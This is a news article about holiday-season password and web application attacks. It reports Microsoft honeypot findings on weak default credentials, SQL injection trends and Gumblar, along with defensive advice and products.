Article

Microsoft, security firms warn of password meltdown

Robert Westervelt, News Editor

Microsoft and several security firms are warning users about protecting their account credentials during the holiday shopping season in the wake of an increasing number of people shopping for gifts online.

The warning is also aimed at enterprises, which could face a number of increased attacks against Web applications by hackers eager to find website flaws to steal lucrative customer data, such as credit card numbers or to set up drive-by attacks to infect visitors. Automated tools are also on the rise, enabling fraudsters to conduct brute force password attacks. If successful, they could buy items with another person's account or snoop for website errors to gain access to a back-end customer database.

Many threats are becoming commonplace online. The FBI's Internet Crime Complaint Center (IC3) logs many complaints from people who experience online auction fraud. Phishing scams that use social engineering tactics to dupe people into freely giving up their account credentials are also popular and lucrative for cybercriminals. The bottom-line, experts say, is to practice login password security; regularly change account passwords and always be on guard for attacks.

"The historical problems have not gone away, but many of the relevant merchants have become much better at dealing with those problems," said Sean Brady, a global expert on issues and mitigation strategies related to online fraud at Bedford, Mass.-based RSA, the security division of EMC Corp. "The

Requires Free Membership to View

problem is that merchants want to build trust with their customers while at the same time customers need to be wary about their online activities."

Brady said many online merchants have processes in place to guard against old-school brute force password attacks. Captcha technologies can offer a reasonable challenge-response test to ensure an automated tool isn't attempting to login or create new accounts. Meanwhile, many merchants reset passwords after a short number of failed access attempts, a method widely used and successful in limiting successful brute force attempts.

But Microsoft is warning that technologies alone can only go so far at protecting account access from password cracker programs. The software giant has deployed a network protocol analyzer and phony FTP server to scan and log various automated attacks it received including those designed to steal account credentials. Details released of an analysis of data it collected since July found that people are making it way too easy for attackers.

The statistics showed many people still using "admin," or "administrator" as their username, suggesting that default usernames and passwords are still being used. Similarly, easy to crack passwords were being used "I23456" was common as well as the simple phrase "password." Default and easy to crack usernames and passwords combined with automated account credential tools make the process all too easy, Microsoft said.

"One attacker tried more than 400,000 username and password combinations," according to a blog entry on password protection by Microsoft researchers Francis Allan Tan Seng and Andrei Saygo at the Microsoft Malware Protection Center's Threat Research and Response blog. The researchers highlighted an automated tool that can test password strength.

"You should take good care of what username and password you're choosing," the researchers wrote. "Having a super strong password is not enough. From time to time, you need to change it, especially when you feel that your account has been compromised."

For enterprises, Secure Sockets Layer (SSL), which encrypts a user's session, is not enough to protect against many automated attacks. Tom Cross, a current member of IBM Internet Security System's X-Force research team, said SQL injection vulnerabilities are by far the favorite target of attackers. SQL Injection exploits detected across the IBM ISS sensor network increased from a few thousand events per day in the spring of 2008 to more than 500,000 events per day by the summer of 2009.

"Generally speaking, these attacks inject iFrames into underlying databases and the hope is that [the malicious code] will get redisplayed to innocent users that view those webpages," Cross said. "What these guys are trying to do is get to something on a legitimate website that redirects users to their exploit toolkit."

A successful SQL injection attack on a legitimate site can infect hundreds of customers with malware before it is detected, including keylogger Trojans designed to record keystrokes when a user logs into an account. Earlier this year, the U.S. Computer Emergency Response Team (US-CERT) warned of the Gumblar malware exploit, which has been spreading onto thousands of websites through stolen FTP credentials, vulnerable Web applications and poor configuration settings. The automated code set up drive-by attacks on the legitimate sites sending security researchers struggling to get the sites repaired or temporarily shut down.

"The bad guys are looking for a sweet spot; a website that doesn't have the security sophistication as some of the other networks do," Cross said. "Unfortunately the kind of automation they're using is making it easier for them to look for thousands of those sweet spots."

Another method of keeping a watchful eye on Web applications and the traffic flooding into a website is through the use of a Web application firewall. Art of Defence, a distributed Web application firewall vendor based in Germany, launched Hyperguard SaaS in April, targeting users of Amazon's EC2 cloud-based infrastructure.

Alex Meisel, chief technology officer and co-founder of Art of Defence, said the firm is giving merchants the ability to deploy another layer of security over their Web applications by installing the plug-in. In addition to common WAF technology, the Hyperguard software includes URL encryption and a Web authentication framework. A trial version of the plug-in is free to merchants, but the firm plans to sell an enterprise-class version next year, Meisel said.

"Companies are finding technology and education is an important part of a layered security strategy," Meisel said. "In the cloud, the magnitude of the problem is much greater because everything is held in one place. People can lose their data at the blink of an eye."